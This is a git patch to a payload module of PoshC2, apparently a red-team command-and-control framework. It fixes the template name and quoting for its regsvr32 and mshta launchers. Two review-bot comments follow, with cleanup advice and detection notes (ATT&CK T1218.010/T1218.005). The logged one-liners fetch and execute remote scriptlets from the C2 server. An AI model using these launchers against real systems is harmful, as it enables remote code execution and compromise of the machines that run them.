From eabe93641df7e9a49fcdefa06726c34639d17c98 Mon Sep 17 00:00:00 2001
From: benpturner <2518196+benpturner@users.noreply.github.com>
Date: Wed, 16 Sep 2020 16:41:21 +0100
Subject: [PATCH] Fix mshta & regsvr32 payloads

---
 poshc2/server/payloads/Payloads.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/poshc2/server/payloads/Payloads.py b/poshc2/server/payloads/Payloads.py
index 262517f8..0f6c017f 100644
--- a/poshc2/server/payloads/Payloads.py
+++ b/poshc2/server/payloads/Payloads.py
@@ -294,7 +294,7 @@ def CreateShellcode(self, name=""):
 def CreateSCT(self, name=""):
 self.QuickstartLog(Colours.END)
 self.QuickstartLog("regsvr32 /s /n /u /i:%s scrobj.dll" % f"{self.FirstURL}/{self.QuickCommand}_rg")
- with open("%s%sdropper_cs.sct" % (PayloadTemplatesDirectory, name), 'r') as f:
+ with open("%s%sdropper_rg.sct" % (PayloadTemplatesDirectory, name), 'r') as f:
 content = f.read()
 content = str(content) \
 .replace("#REPLACEME#", self.CreateRawBase())
@@ -302,7 +302,7 @@ def CreateSCT(self, name=""):
 f.write(content)

 self.QuickstartLog(Colours.END)
- self.QuickstartLog("mshta.exe vbscript:GetObject(\"script:%s\")(window.close)" % f"{self.FirstURL}/{self.QuickCommand}_cs")
+ self.QuickstartLog("mshta.exe 'vbscript:GetObject(\"script:%s\")(window.close)'" % f"{self.FirstURL}/{self.QuickCommand}_cs")
 with open("%s%sdropper_cs.sct" % (PayloadTemplatesDirectory, name), 'r') as f:
 content = f.read()
 content = str(content) \
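Review bot: The template name in `open("%s%sdropper_rg.sct" % (PayloadTemplatesDirectory, name), 'r')` has to agree with the `_rg` URI suffix logged on the line above it, and nothing in the code states or enforces that pairing, which is presumably how `dropper_cs.sct` ended up here. I would add `# template suffix must match the _rg URI logged above` over the `with open` line; the second hunk shows a near-identical read/replace/write block for `_cs`, so a small helper taking the suffix would remove the duplication. For defenders reading this file, the logged line is the regsvr32 scriptlet pattern tracked as ATT&CK T1218.010, and regsvr32.exe started with an `/i:` URL together with `scrobj.dll` is the process-creation signal to alert on. CreateSCT continues past the end of the hunk.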
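Review bot: The changed `QuickstartLog` line in the second hunk mixes a %-format, an f-string operand and backslash-escaped double quotes, so the newly added single quotes are easy to misread; a single f-string is plainer: `self.QuickstartLog(f"mshta.exe 'vbscript:GetObject(\"script:{self.FirstURL}/{self.QuickCommand}_cs\")(window.close)'")`. As far as the visible lines show, the quotes change only the text written to the quickstart log, not the `dropper_cs.sct` content read below it. On the detection side this is the mshta pattern tracked as ATT&CK T1218.005, and rules are better keyed on mshta.exe with a `vbscript:` or `script:` argument than on an exact command-line prefix, since the quoting may or may not survive into the recorded command line depending on the shell. CreateSCT starts before and ends after this hunk.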